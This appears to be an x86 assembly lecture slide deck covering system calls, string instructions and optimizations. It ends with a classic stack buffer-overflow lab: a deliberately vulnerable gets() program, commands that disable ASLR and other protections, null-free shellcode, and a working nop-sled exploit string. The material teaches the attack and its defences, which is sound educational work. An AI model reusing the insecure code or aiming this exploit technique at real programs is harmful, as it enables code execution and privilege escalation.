pushl %ebx # Save %ebx
movl 8(%ebp), %ebx # %ebx = head
traverse_dump:
testl %ebx, %ebx # if (%ebx == NULL)
jz at_end_dump # goto at_end_dump;
movl (%ebx), %ecx # %ecx = %ebx->data
pushl %ecx # printf("%d\n", %ecx)
pushl $fmtStr
call printf
addl $8, %esp
movl 4(%ebx), %ebx # %ebx = %ebx->next
jmp traverse_dump # Loop
at_end_dump:
pop %ebx # Restore %ebx
mov %ebp, %esp
pop %ebp
ret
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Linked List (linked\_list.S) Continued}
\mvs
\begin{gascode}
main:
pushl $86 # %eax = list_alloc(86);
call list_alloc
addl $4, %esp
movl %eax, head # head = %eax
pushl $75 # list_add(head, 75);
pushl head
call list_add
addl $8, %esp
pushl $309 # list_add(head, 309);
pushl head
call list_add
addl $8, %esp
pushl head # list_dump(head);
call list_dump
addl $4, %esp
movl $0, %eax # Return 0
ret
.section .data
head: .long 0
fmtStr: .ascii "%d\n\0"
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Linked List (linked\_list.S) Runtime}
\mvs
\begin{textcode}
$ as linked_list.S -o linked_list.o
$ gcc linked_list.o -o linked_list
$ ./linked_list
86
75
309
$
\end{textcode}
\end{frame}
\section*{Lingering Questions?}
\section{Topic 10: System Calls}
\begin{frame}[fragile,t]
\frametitle{The User Program Condition}
\begin{itemize}
\item Monolithic kernel like Linux completely sandboxes a user program
\begin{itemize}
\item User program executes at a lower CPU privilege
\item Virtual memory hides other programs, restricts access to kernel memory and memory-mapped I/O
\end{itemize}
\vs \vs
\pause
\item User program can effectively only do pure computation and manipulate user memory mapped by the OS
\end{itemize}
\pause
\begin{figure}
\centering
\includegraphics[height=0.40\paperheight]{figures/hamster.jpg}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Interrupts and System Calls}
\begin{itemize}
\item CPU is capable of servicing hardware and software interrupts
\begin{itemize}
\item timer tick, DMA exchange complete, divide-by-zero
\end{itemize}
\pause
\item External interrupts can happen asynchronously --- are not polled --- and \textbf{interrupt} current program
\pause
\item CPU saves current state in an architecture-specific way, switches to privileged mode, and jumps to the interrupt handler in the kernel
\pause
\item Software interrupt, instruction {\ttfamily int <number>}, provides a mechanism to make a request to the kernel to do something user program cannot
\begin{itemize}
\item System call
\end{itemize}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{System Call Interface}
\begin{figure}
\centering
\includegraphics[height=0.65\paperheight]{figures/monolithic.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Linux System Calls}
\begin{itemize}
\item Currently 346 system calls
\item Common ones are {\ttfamily exit(), read(), write(), open(), close(), ioctl(), fork(), execve()}, etc.
\pause
\begin{itemize}
\item Get more obscure as the system call number goes up
\item {\ttfamily less /usr/include/asm/unistd\_32.h}
\item {\ttfamily man 2 syscalls}
\end{itemize}
\pause
\item Operating System specific convention for making a system call
\pause
\item On Linux it is:
\begin{itemize}
\item system call number in {\ttfamily \%eax}
\item arguments in order {\ttfamily \%ebx, \%ecx, \%edx, \%esi, \%edi}
\item invoke software interrupt with vector {\ttfamily 0x80}: {\ttfamily int \$0x80}
\item return value in \%eax
\end{itemize}
\pause
\item All registers preserved except for {\ttfamily \%eax}
\item Passes arguments in registers, not the stack like {\ttfamily cdecl}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Linux System Calls Reference}
\begin{itemize}
\item \url{http://syscalls.kernelgrok.com/}
\end{itemize}
\begin{figure}
\centering
\includegraphics[height=0.50\paperheight]{figures/syscalls.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example System Calls (example-syscall.S)}
\mvs
\begin{gascode}
.section .text
_start:
# syscall open("foo", O_CREAT | O_WRONLY, 0644);
movl $0x05, %eax
movl $filename, %ebx
movl $0x41, %ecx
movl $0644, %edx
int $0x80
# fd in %eax from open(), move it to %ebx for write()
movl %eax, %ebx
# syscall write(fd, message, messageLen);
movl $0x04, %eax
# fd in %ebx from above
movl $message, %ecx
movl $messageLen, %edx
int $0x80
# syscall close(fd);
movl $0x06, %eax
# fd still in %ebx
int $0x80
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example System Calls (example-syscall.S)}
\mvs
\begin{gascode}
# syscall exit(0);
movl $0x01, %eax
movl $0x0, %ebx
int $0x80
.section .data
filename: .ascii "foo\0"
message: .ascii "Hello World!\n"
.equ messageLen, . - message
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example System Calls (example-syscall.S) Runtime}
\mvs
\begin{textcode}
$ as example-syscall.S -o example-syscall.o
$ ld example-syscall.o -o example-syscall
$ ./example-syscall
$ cat foo
Hello World!
$
\end{textcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example System Calls (example-syscall.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ as example-syscall.S -o example-syscall.o
$ ld example-syscall.o -o example-syscall
$ ojbdump -D example-syscall
Disassembly of section .text:
08048074 <_start>:
8048074: b8 05 00 00 00 mov $0x5,%eax
8048079: bb b0 90 04 08 mov $0x80490b0,%ebx
804807e: b9 41 00 00 00 mov $0x41,%ecx
8048083: ba a4 01 00 00 mov $0x1a4,%edx
8048088: cd 80 int $0x80
804808a: 89 c3 mov %eax,%ebx
804808c: b8 04 00 00 00 mov $0x4,%eax
8048091: b9 b4 90 04 08 mov $0x80490b4,%ecx
8048096: ba 0d 00 00 00 mov $0xd,%edx
804809b: cd 80 int $0x80
804809d: b8 06 00 00 00 mov $0x6,%eax
80480a2: cd 80 int $0x80
80480a4: b8 01 00 00 00 mov $0x1,%eax
80480a9: bb 00 00 00 00 mov $0x0,%ebx
80480ae: cd 80 int $0x80
Disassembly of section .data:
080490b0 <filename>:
80490b0: 66 6f outsw %ds:(%esi),(%dx)
...
\end{customobjdumpcode}
\end{frame}
\section{Program Example: tee}
\begin{frame}[fragile,t]
\mvs
\frametitle{tee (tee.S)}
\begin{gascode}
# Tee (tee.S)
.section .text
_start:
push %ebp
mov %esp, %ebp
subl $4, %esp # int fd; on the stack
cmpl $2, 4(%ebp) # if (argc != 2)
jne tee_usage # goto tee_usage;
tee_open:
# syscall open(argv[1], O_CREAT|O_WRONLY|O_TRUNC, 0644);
movl $0x05, %eax
movl 12(%ebp), %ebx
movl $0x241, %ecx
movl $0644, %edx
int $0x80
cmpl $0, %eax # if (%eax < 0)
jl tee_exit # goto tee_exit;
movl %eax, -4(%ebp) # fd = %eax
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{tee (tee.S) Continued}
\begin{gascode}
tee_loop:
# Read from input: syscall read(0, &c, 1);
movl $3, %eax
movl $0, %ebx
movl $c, %ecx
movl $1, %edx
int $0x80
cmpl $1, %eax # if (%eax < 1)
jl tee_exit # goto tee_exit;
# Write to file: syscall write(fd, &c, 1);
movl $4, %eax
movl -4(%ebp), %ebx
movl $c, %ecx
movl $1, %edx
int $0x80
# Write to stdout: syscall write(1, &c, 1);
movl $4, %eax
movl $1, %ebx
movl $c, %ecx
movl $1, %edx
int $0x80
jmp tee_loop # Loop
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{tee (tee.S) Continued}
\begin{gascode}
tee_usage:
# syscall write(1, usageStr, usageStrLen);
movl $4, %eax
movl $1, %ebx
movl $usageStr, %ecx
movl usageStrLen, %edx
int $0x80
tee_exit:
# syscall exit(0);
movl $1, %eax
movl $0, %ebx
int $0x80
.section .rodata
# Usage string and length
usageStr: .ascii "./tee <file>\n"
.equ usageStrLen, . - message
.section .bss
# Read character var
.comm c, 1
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{tee (tee.S) Runtime}
\begin{textcode}
$ as tee.S -o tee.o
$ ld tee.o -o tee
# Count total number of syscalls while generating a "CSV syscall,no" list
$ egrep "NR.*$" -o /usr/include/asm/unistd_32.h |
cut -b 4- | sed 's/ /,/' | ./tee syscalls.txt | wc
346 346 4604
$ cat syscalls.txt
restart_syscall,0
exit,1
fork,2
read,3
write,4
open,5
close,6
waitpid,7
creat,8
link,9
unlink,10
...
\end{textcode}
\end{frame}
\section{Advanced Topic 11: Role of libc}
\begin{frame}[fragile,t]
\frametitle{{\ttfamily libc} for library functions and system calls}
\begin{itemize}
\item {\ttfamily libc} provides optimized string, formatting, pattern matching, math, date and time, etc. computation functions
\item {\ttfamily libc} wraps system calls and provides more-so platform independent data structures and interfaces
\begin{itemize}
\item file streams: {\ttfamily FILE *, fopen(), fclose(), fread(), fwrite()}
\item sockets: {\ttfamily socket(), bind(), accept(), send(), recv()}
\end{itemize}
\item In other words, {\ttfamily libc} implements the C library of the POSIX standard
\vs
\pause
\item You can choose not to link with libc, only use syscalls, and implement the other functionality yourself (interesting challenge)
\vs
\pause
\item Some I/O operations will be more efficient through {\ttfamily libc} than direct system calls, due to buffering in user space
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{{\ttfamily libc} for dynamic memory management (heap)}
\begin{columns}[T]
\column{0.7\textwidth}
\begin{itemize}
\item Operating system allocates heap memory for user program
\item {\ttfamily libc} {\ttfamily malloc()} and {\ttfamily free()} manages allocations, deallocations, fragmentation of the heap
\item Heap grows up, stack grows down
\end{itemize}
\column{0.3\textwidth}
\includegraphics[height=0.70\paperheight]{figures/memlayoutvm.png}
\end{columns}
\end{frame}
\section{Advanced Topic 12: x86 String Operations}
\begin{frame}[fragile,t]
\frametitle{Some Overlooked Registers}
\begin{figure}
\centering \includegraphics[width=0.85\textwidth]{figures/386state.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{Special Instructions for {\ttfamily \%esi} and {\ttfamily \%edi}}
\begin{itemize}
\item We've seen {\ttfamily push} and {\ttfamily pop} instructions which manipulate {\ttfamily \%esp} in a special way
\item Special string instructions exist for {\ttfamily \%esi} and {\ttfamily \%edi}
\begin{itemize}
\item {\ttfamily \%esi} is the source string pointer
\item {\ttfamily \%edi} is the destination string pointer
\end{itemize}
\pause
\item {\ttfamily movs} does {\ttfamily *\%edi++ = *\%esi++}
\item {\ttfamily cmps} does {\ttfamily cmp \%esi++, \%edi++}
\item {\ttfamily scas} does {\ttfamily cmp \%eax, \%edi++}
\item {\ttfamily lods} does {\ttfamily mov \%esi++, \%eax}
\item {\ttfamily stos} does {\ttfamily mov \%eax, \%edi++}
\pause
\vs
\item Instruction size suffix {\ttfamily b, w, l} determines copy, compare, move size and post-increment amount (1, 2, 4)
\item DF flag in {\ttfamily \%eflags} determines if it is a \\ post-increment (DF=0) or post-decrement (DF=1)
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{Example 1 of String Instructions (example-string1.S)}
\begin{gascode}
.section .text
cld # Clear DF, we want to post-increment
# Load str1 with 8 of 0xff
movl $str1, %edi # Set up our string destination pointer
# Load the first four a byte at a time
movb $0xFF, %al
stosb # *(%edi++) = %al
stosb # *(%edi++) = %al
stosb # *(%edi++) = %al
stosb # *(%edi++) = %al
# Load the last four with a single dword
movl $0xFFFFFFFF, %eax
stosl # *(%edi) = %eax, %esi += 4
# Copy str1 to str2
movl $str1, %esi # str1 in the source
movl $str2, %edi # str2 in the destination
# Two dword moves copies all 8 bytes
movsl
movsl
# Done!
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{Example 1 of String Instructions (example-string1.S) Continued}
\begin{gascode}
.section .bss
.comm str1, 8
.comm str2, 8
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Repeat Prefix for String Instructions}
\begin{itemize}
\item String instructions can be prefixed by \\ {\ttfamily rep, repe/repz, repne/repnz}
\item {\ttfamily rep <string instr>}
\begin{itemize}
\item repeat the string instruction until {\ttfamily \%ecx} is 0
\end{itemize}
\item {\ttfamily repe/repz <string instr>}
\begin{itemize}
\item repeat the string instruction until {\ttfamily \%ecx} is 0 or ZF flag is 0
\end{itemize}
\item {\ttfamily repne/repnz <string instr>}
\begin{itemize}
\item repeat the string instruction until {\ttfamily \%ecx} is 0 or ZF flag is 1
\end{itemize}
\item {\ttfamily \%ecx} automatically decremented for you
\vs
\pause
\item Simple, inefficient {\ttfamily memset()}: {\ttfamily rep stosb}
\item Simple, inefficient {\ttfamily memcpy()}: {\ttfamily rep movsb}
\item Simple, inefficient {\ttfamily strlen()}: {\ttfamily repne scasb}
\item Simple, inefficient {\ttfamily strncmp()}: {\ttfamily repe cmpsb}
\item Can be better optimized for memory alignment and scan/copy size
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{Example 2 of String Instructions (example-string2.S)}
\begin{gascode}
.section .text
.global main
main:
# memset(str, 'A', 48);
pushl $48
pushl $'A
pushl $str
call asm_memset
addl $12, %esp
# str[48] = '\n'; str[49] = '\0';
movb $'\n', str+48
movb $0, str+49
# printf(str);
pushl $str
call printf
addl $4, %esp
ret
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{Example 2 of String Instructions (example-string2.S) Continued}
\begin{gascode}
# void *memset(void *s, int c, size_t n);
asm_memset:
pushl %edi
pushl %ebp
movl %esp, %ebp
movl 12(%ebp), %edi # %edi = s
movl 16(%ebp), %eax # %eax = c
movl 20(%ebp), %ecx # %ecx = n
rep stosb
movl 12(%ebp), %eax # %eax = s
movl %ebp, %esp
popl %ebp
popl %edi
ret
.section .bss
.comm str, 50
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{Example 2 of String Instructions (example-string2.S) Runtime}
\begin{textcode}
$ as example-string2.S -o example-string2
$ gcc example-string2.o -o example-string2
$ ./example-string2
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
$
\end{textcode}
\end{frame}
\begin{frame}[fragile,t]
\mvs
\frametitle{Back to the opening glibc strlen example}
\begin{customobjdumpcode}
080483cd <glibc_strlen>:
80483cd: 57 push %edi
80483ce: b9 ff ff ff ff mov $0xffffffff,%ecx
80483d3: b8 00 00 00 00 mov $0x0,%eax
80483d8: 8b 7c 24 08 mov 0x8(%esp),%edi
80483dc: fc cld
80483dd: f2 ae repnz scas %es:(%edi),%al
80483df: b8 fe ff ff ff mov $0xfffffffe,%eax
80483e4: 29 c8 sub %ecx,%eax
80483e6: 5f pop %edi
80483e7: c3 ret
\end{customobjdumpcode}
\begin{itemize}
\item Trick is to load {\ttfamily \%ecx} with -1 or {\ttfamily 0xFFFFFFFF}
\item Assumption: string is not longer than 4 gigabytes
\item Reasonable assumption on 32-bit system
\end{itemize}
\end{frame}
\section{Advanced Topic 13: Three Simple Optimizations}
\begin{frame}[fragile,t]
\frametitle{Three Basic Optimizations}
\mvs
\begin{itemize}
\item Clear a register with {\ttfamily xor} rather than a {\ttfamily mov}
\vspace{0.5em}
\begin{customobjdumpcode}
0: a1 00 00 00 00 movl $0x0,%eax
0: 31 c0 xorl %eax,%eax
\end{customobjdumpcode}
\vspace{0.5em}
\pause
\item Use {\ttfamily lea} for general purpose arithmetic when applicable
\begin{itemize}
\item {\ttfamily lea} calculates the indirect memory address \\ {\ttfamily \%reg + \%reg*(1,2,4,8) + \$constant} \\ and stores the effective address without dereferencing memory
\end{itemize}
\vspace{0.5em}
\begin{gascode}
# Compute expression: %eax + %ebx*2 + 10
leal 10(%eax, %ebx, 2), %eax
\end{gascode}
\pause
\item Use a more efficient loop structure when possible
\vspace{-1.0em}
\begin{columns}[T]
\centering
\column{0.4\textwidth}
\begin{gascode*}{fontsize=\fontsize{8}{8}}
# for (i = 0; i < 10; i++) { ; }
xorl %ecx, %ecx
loop:
cmpl $10, %ecx
jge loop_done
nop
incl %ecx
jmp loop
loop_done:
\end{gascode*}
\column{0.4\textwidth}
\begin{gascode*}{fontsize=\fontsize{8}{8}}
# i = 10; do { ; } while(--i != 0);
movl $10, %ecx
loop:
nop
decl %ecx
jnz loop
\end{gascode*}
\end{columns}
\end{itemize}
\end{frame}
\section{Advanced Topic 14: x86 Extensions}
\begin{frame}[fragile,t]
\frametitle{Overview}
\begin{itemize}
\item Separate instruction sets
\item x87 floating point unit
\begin{itemize}
\item 80-bit double-extended precision floating point registers
\item add, subtract, multiply, divide, square root, round, cosine, sine, compare, load/store, etc. for floating point numbers
\end{itemize}
\pause
\item Single Instruction Multiple Data (SIMD) instruction sets \\ like MMX, SSE, SSE2, SSE3, SSE4, ...
\begin{itemize}
\item Single instruction carries out an operation (add, subtract, etc.) on multiple data blocks, a vector
\item MMX was a SIMD instruction set for integers
\pause
\item SSE is SIMD instruction set for integers and floating point
\pause
\item SSE1 had 32-bit single precision floating point support
\item SSE2 added 64-bit double precision floating point support
\pause
\item SSE registers are {\%xmm0 - \%xmm7}, each 128-bit
\item SSE instructions can treat each register as multiple floats, doubles, chars, shorts, etc.
\end{itemize}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Scalar versus SIMD}
\begin{figure}
\includegraphics[width=\textwidth]{figures/simd.png}
\footnote{\url{http://software.intel.com/en-us/articles/introduction-to-intel-advanced-vector-extensions/}}
\end{figure}
\end{frame}
\section{Advanced Topic 15: Stack-based Buffer Overflows}
\begin{frame}[fragile,t]
\frametitle{Classic Insecure Example in C (example-insecure.c)}
\begin{ccode}
#include <stdio.h>
void get_input(void) {
char buff[100];
gets(buff);
}
int main(void) {
printf("input: ");
get_input();
return 0;
}
\end{ccode}
\vs
\pause
\begin{textcode}
$ gcc -fno-stack-protector -z execstack example-insecure.c
-o example-insecure
\end{textcode}
We'll build this with the GCC stack protector disabled and executable stack (for reasons explained in a few slides)
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Disassembly of {\ttfamily get\_input()}}
\mvs
\begin{ccode}
void get_input(void) {
char buff[100];
gets(buff);
}
\end{ccode}
\vs
\begin{customobjdumpcode}
$ objdump -d example-insecure
...
08048414 <get_input>:
# Function prologue
8048414: 55 push %ebp
8048415: 89 e5 mov %esp,%ebp
# Space allocated on the stack for buff[100]
8048417: 81 ec 88 00 00 00 sub $0x88,%esp
# Address of buff in %eax
804841d: 8d 45 94 lea -0x6c(%ebp),%eax
# Pushing &buff onto the stack
8048420: 89 04 24 mov %eax,(%esp)
# gets(buff);
8048423: e8 f8 fe ff ff call 8048320 <gets@plt>
# Function epilogue
8048428: c9 leave
8048429: c3 ret
...
\end{customobjdumpcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Stack Frame of {\ttfamily get\_input()}}
\mvs
\begin{gascode}
# Function prologue
push %ebp
mov %esp,%ebp
# Space allocated on the stack for buff[100]
sub $0x88,%esp
# Address of buff in %eax
lea -0x6c(%ebp),%eax
# Pushing &buff onto the stack
mov %eax,(%esp)
# gets(buff);
call 8048320 <gets@plt>
# Function epilogue
leave
ret
# Stack frame right before call to gets()
# | ... |
# | retaddr |
# | saved ebp |
# | buf |
# | buf |
# .
# | buf |
# | buf |
# | &buf | <- %esp
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Buffer Overflow}
\mvs
\begin{itemize}
\item With a well-crafted buffer, we can inject instructions into the buffer on the stack, as well as an over-written return address to those instructions
\item When {\ttfamily get\_input()} returns, it will return into our injected instructions
\end{itemize}
\begin{figure}
\centering
\includegraphics[height=0.55\paperheight]{figures/bufferoverflow.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Overwriting the Return Address}
\begin{itemize}
\item But how do we pick the return address? What is the address of stuff on the stack anyway?
\pause
\item Let's write a small program to find out...
\end{itemize}
\begin{ccode}
#include <stdio.h>
int main(void) {
char c;
printf("%p\n", &c);
return 0;
}
\end{ccode}
\begin{textcode}
$ gcc example-addrstack.c -o example-addrstack
$ ./example-addrstack
0xbfe3d16f
$ ./example-addrstack
0xbfdef6ff
$ ./example-addrstack
0xbfefbecf
\end{textcode}
\pause
\begin{itemize}
\item It's changing every time we run it!
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Address Space Layout Randomization (ASLR)}
\begin{itemize}
\item We just witnessed the effect of ASLR, which randomly initializes the position of code, libraries, heap, and stack in the user program's address space
\item However, the addresses were all relatively close to each other, so there is an opportunity for guessing... (16-bits of guessing on 32-bit)
\pause
\item For our purposes, let's turn off ASLR.
\end{itemize}
\vs
\begin{textcode}
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ ./example-addrstack
0xbffff28f
$ ./example-addrstack
0xbffff28f
$ ./example-addrstack
0xbffff28f
\end{textcode}
\begin{itemize}
\item Now we have an idea of where variables on the stack live
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Shellcode}
\begin{itemize}
\item Next step is to write our instructions to inject
\item Often called shellcode, because it often spawns a privileged shell
\pause
\vs\vs
\item Must be position-independent
\begin{itemize}
\item Code cannot rely on absolute addresses for its data, since we're not sure {\bf exactly} where it will live on the stack, just roughly
\end{itemize}
\pause
\item Must contain no newlines, and in other cases, no null bytes
\begin{itemize}
\item Otherwise {\ttfamily gets()} will stop reading input prematurely
\end{itemize}
\pause
\vs
\item Let's make it do {\ttfamily write(1, "Hello!", 6);} and {\ttfamily exit(0);}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Hello Shellcode Take 1 (example-shellcode1.S)}
\mvs
\begin{gascode}
_start:
# Clever way to get string address into %ecx
jmp get_str_addr
got_str_addr:
popl %ecx
# write(1, "Hello!", 6);
movl $0x04, %eax
movl $0x01, %ebx
movl $6, %edx
int $0x80
# exit(0);
movl $0x01, %eax
# %ebx already zero from above
int $0x80
get_str_addr:
call got_str_addr
.ascii "Hello!"
\end{gascode}
\begin{textcode}
$ as example-shellcode1.S -o example-shellcode1.o
$ ld example-shellcode1.o -o example-shellcode1
$ ./example-shellcode1
Hello!$
\end{textcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Hello Shellcode Take 1 (example-shellcode1.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ objdump -D example-shellcode1
Disassembly of section .text:
08048054 <_start>:
8048054: eb 19 jmp 804806f <get_str_addr>
08048056 <got_str_addr>:
8048056: 59 pop %ecx
8048057: b8 04 00 00 00 mov $0x4,%eax
804805c: bb 01 00 00 00 mov $0x1,%ebx
8048061: ba 06 00 00 00 mov $0x6,%edx
8048066: cd 80 int $0x80
8048068: b8 01 00 00 00 mov $0x1,%eax
804806d: cd 80 int $0x80
0804806f <get_str_addr>:
804806f: e8 e2 ff ff ff call 8048056 <got_str_addr>
8048074: 48 dec %eax
8048075: 65 gs
8048076: 6c insb (%dx),%es:(%edi)
8048077: 6c insb (%dx),%es:(%edi)
8048078: 6f outsl %ds:(%esi),(%dx)
8048079: 21 .byte 0x21
\end{customobjdumpcode}
\begin{itemize}
\item We want to get rid of those null bytes...
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Hello Shellcode Take 2 (example-shellcode2.S)}
\mvs
\begin{gascode}
_start:
# Clever way to get string address into %ecx
jmp get_str_addr
got_str_addr:
popl %ecx
# write(1, "Hello!", 6);
xorl %eax, %eax
xorl %ebx, %ebx
xorl %edx, %edx
incl %ebx
addb $4, %al
addb $6, %dl
int $0x80
# exit(0);
xorl %eax, %eax
incl %eax
# %ebx already zero from above
int $0x80
get_str_addr:
call got_str_addr
.ascii "Hello!"
\end{gascode}
\begin{textcode}
$ as example-shellcode2.S -o example-shellcode2.o && ld ...
$ ./example-shellcode2
Hello!$
\end{textcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Hello Shellcode Take 2 (example-shellcode2.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ objdump -D example-shellcode2
Disassembly of section .text:
08048054 <_start>:
8048054: eb 14 jmp 804806a <get_str_addr>
08048056 <got_str_addr>:
8048056: 59 pop %ecx
8048057: 31 c0 xor %eax,%eax
8048059: 31 db xor %ebx,%ebx
804805b: 31 d2 xor %edx,%edx
804805d: 43 inc %ebx
804805e: 04 04 add $0x4,%al
8048060: 80 c2 06 add $0x6,%dl
8048063: cd 80 int $0x80
8048065: 31 c0 xor %eax,%eax
8048067: 40 inc %eax
8048068: cd 80 int $0x80
0804806a <get_str_addr>:
804806a: e8 e7 ff ff ff call 8048056 <got_str_addr>
804806f: 48 dec %eax
8048070: 65 gs
8048071: 6c insb (%dx),%es:(%edi)
8048072: 6c insb (%dx),%es:(%edi)
8048073: 6f outsl %ds:(%esi),(%dx)
8048074: 21 .byte 0x21
\end{customobjdumpcode}
\vspace{-0.5em}
\begin{itemize}
\item No null bytes or newlines!
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Preparing our Payload}
\begin{itemize}
\item Reading off the {\ttfamily objdump} disassembly, we can write out the instructions as an ASCII string with escape characters
\end{itemize}
\begin{textcode}
"\xeb\x14\x59\x31\xc0\x31\xdb\x31\xd2\x43\x04\x04\x80\xc2\x06\xcd
\x80\x31\xc0\x40\xcd\x80\xe8\xe7\xff\xff\xff\x48\x65\x6c\x6c\x6f\x21"
\end{textcode}
\pause
\begin{itemize}
\item So the plan is to pass a string to the insecure example with the shellcode, enough A's to overflow the buff, and a new return address
\pause
\item But if the return address isn't exactly right, it won't work!
\pause
\item We can make it more robust by adding a \textbf{nop-sled}: a bunch of nops preceding our shellcode
\item Even if our guessed return address is off by a couple of bytes, as long as the CPU returns to somewhere within the nop-sled, execution will slide down to our real injected instructions
\item Machine code for a {\ttfamily nop} is {\ttfamily 0x90}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{The Actual Exploit...}
\mvs
\begin{itemize}
\item First, find out how many A's it takes to break it...
\end{itemize}
\begin{textcode}
$ perl -e 'print "A" x 107' | ./example-insecure
input:
$ perl -e 'print "A" x 108' | ./example-insecure
input:
Segmentation fault
$
\end{textcode}
\pause
\begin{itemize}
\item Then, use gdb to find out the number of A's to start overwriting the return address...
\end{itemize}
\begin{textcode}
$ gdb example-insecure
...
<input 113 A's>
Program received signal SIGSEGV, Segmentation fault.
0x08040041 in ?? ()
\end{textcode}
\begin{itemize}
\item Lower byte of return address, now \%eip, was overwritten by an {\ttfamily 'A'}, or {\ttfamily 0x41}.
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{The Actual Exploit... (example-insecure\_exploit.sh) Continued}
\mvs
\begin{textcode*}{fontsize=\fontsize{8}{8}}
Prepare small nop-sled, shellcode, A's, and return address that is
116 characters long.
$ perl -e 'print "\x90" x 20 . "\xeb\x14\x59\x31\xc0\x31\xdb\x31\xd2\x43
\x04\x04\x80\xc2\x06\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe7\xff\xff\xff
\x48\x65\x6c\x6c\x6f\x21" . "A" x 59 . "\x80\xf2\xff\xbf"' | wc
0 1 116
\end{textcode*}
\pause
\begin{textcode*}{fontsize=\fontsize{8}{8}}
Guess at the return address, starting at 0xbffff280:
$ perl -e 'print "\x90" x 20 . "\xeb\x14\x59\x31\xc0\x31\xdb\x31\xd2\x43
\x04\x04\x80\xc2\x06\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe7\xff\xff\xff
\x48\x65\x6c\x6c\x6f\x21" . "A" x 59 . "\x80\xf2\xff\xbf"' | ./example-insecure
input:
Segmentation fault
\end{textcode*}
\pause
\begin{textcode*}{fontsize=\fontsize{8}{8}}
$ perl -e 'print "\x90" x 20 . "\xeb\x14\x59\x31\xc0\x31\xdb\x31\xd2\x43
\x04\x04\x80\xc2\x06\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe7\xff\xff\xff
\x48\x65\x6c\x6c\x6f\x21" . "A" x 59 . "\x70\xf2\xff\xbf"' | ./example-insecure
input:
Illegal instruction
\end{textcode*}
\pause
\begin{textcode*}{fontsize=\fontsize{8}{8}}
$ perl -e 'print "\x90" x 20 . "\xeb\x14\x59\x31\xc0\x31\xdb\x31\xd2\x43
\x04\x04\x80\xc2\x06\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe7\xff\xff\xff
\x48\x65\x6c\x6c\x6f\x21" . "A" x 59 . "\x60\xf2\xff\xbf"' | ./example-insecure
input:
Hello!$
\end{textcode*}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Closing Notes}
\begin{itemize}
\item If vulnerable program was running as root, shellcode can spawn a root shell
\item If vulnerable program was suid root, shellcode can {\ttfamily setuid(0)} and then spawn a root shell
\pause
\item We had to disable three security mechanisms to allow the traditional stack-based buffer overflow to work.
\begin{itemize}
\item GCC Stack Protector \\ (disabled with {\small \ttfamily -fno-stack-protector} gcc option)
\item Non-Executable Stack \\ (disabled with {\small \ttfamily -z execstack} gcc option)
\item Address Space Layout Randomization \\ (disabled by writing 0 to {\small \ttfamily /proc/sys/kernel/randomize\_va\_space})
\end{itemize}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Security Mechanisms to Prevent Stack-based Buffer Overflows}
\begin{itemize}
\item GCC Stack Protector
\begin{itemize}
\item GCC generates code to install a random guard value on the stack, below the saved frame pointer, and checks for its validity before the function returns
\item If the guard value is corrupted by a buffer overflow, the pre-return check will catch it
\end{itemize}
\pause
\item Non-Executable Stack
\begin{itemize}
\item NX page table entry bit introduced in x86-64 processors. Linux kernel uses them to mark the stack non-executable, so shellcode cannot execute from the stack
\end{itemize}
\pause
\item Address Space Layout Randomization
\begin{itemize}
\item User program address space is randomized to make it difficult to guess shared library function locations or stack variable locations
\item Increases difficulty of finding a suitable return address
\end{itemize}
\end{itemize}
\end{frame}
\section{Extra Topic 1: Intel/nasm Syntax}
\begin{frame}[fragile,t]
\frametitle{Differences}
\begin{itemize}
\item Intel Syntax: {\ttfamily <mnemonic> <dest>, <src>}
